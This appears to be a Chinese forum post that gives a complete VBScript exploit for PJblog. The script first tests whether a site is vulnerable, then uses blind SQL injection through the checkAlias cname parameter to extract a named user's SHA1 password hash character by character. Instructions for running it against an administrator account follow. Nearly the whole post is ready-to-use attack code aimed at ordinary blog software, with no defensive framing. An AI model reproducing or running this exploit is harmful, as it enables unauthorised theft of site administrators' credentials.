|
真想不明白这样的漏洞这么久了官方为什么不修复 到现在还有此类漏洞 伸直更可怕的注册会员直插一句话工具是用VBS写的,代码如下:
复制内容到剪贴板程序代码
If WScript.Arguments.Count <> 2 Then
WScript.Echo “Usage: Cscript.exe Exp.vbs 要检测的论坛网址 要检测的用户名”
WScript.Echo “Example: Cscript.exe Exp.vbs http://www.pjhome.net puterjam”
WScript.Quit
End If
attackUrl = WScript.Arguments(0)
attackUser = WScript.Arguments(1)
attackUrl = Replace(attackUrl,”\”,”/”)
If Right(attackUrl , 1) <> “/” Then
attackUrl = attackUrl & “/”
End If
SHA1Charset = “0123456789ABCDEFJ”
strHoleUrl = attackUrl & “action.asp?action=checkAlias&cname=0kee”"”
If IsSuccess(strHoleUrl & “or “”1″”=”"1″) And Not IsSuccess(strHoleUrl & “and “”1″”=”"2″) Then
WScript.Echo “恭喜!存在漏洞”
Else
WScript.Echo “没有检测到漏洞”
WScript.Quit
End If
For n=1 To 40
For i=1 To 17
strInject = strHoleUrl & ” or 0<(Select Count(*) From blog_member Where mem_name=’” & attackUser & “‘ And mem_password>=’” & strResult & Mid(SHA1Charset, i, 1) & “‘) And “”1″”=”"1″
If Not IsSuccess(strInject) Then
strResult = strResult & Mid(SHA1Charset, i-1, 1)
Exit For
End If
strPrint = chr(13) & “Password(SHA1): ” & strResult & Mid(SHA1Charset, i, 1)
WScript.StdOut.Write strPrint
Next
Next
WScript.Echo Chr(13) & Chr (10) & “Done!”
Function PostData(PostUrl)
Dim Http
Set Http = CreateObject(“msxml2.serverXMLHTTP”)
With Http
.Open “GET”,PostUrl,False
.Send ()
PostData = .ResponseBody
End With
Set Http = Nothing
PostData =bytes2BSTR(PostData)
End Function
Function bytes2BSTR(vIn)
Dim strReturn
Dim I, ThisCharCode, NextCharCode
strReturn = “”
For I = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn, I, 1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn, I + 1, 1))
strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
I = I + 1
End If
Next
bytes2BSTR = strReturn
End Function
Function IsSuccess(PostUrl)
strData = PostData(PostUrl)
‘Wscript.Echo strData
if InStr(strData,”check_error”) >0 then
IsSuccess = True
Else
IsSuccess = False
End If
‘Wscript.Sleep 500 ‘让系统休息一下
End Function
利用方法:在cmd下,输入“Cscript 1.vbs 要检测的blog网址 要检测的管理员用户名”(不包括双引号)
得到是管理员密码的SHA1散列,貌似现在破解很难,只能暴力破解,不知道要破到什么时候。网上在线破解的多是MD5,所以好多网站都改用SHA1加密了,我们的PJblog也不例外,不过过段时间在线破解SHA1应该也会越来越多。
|
|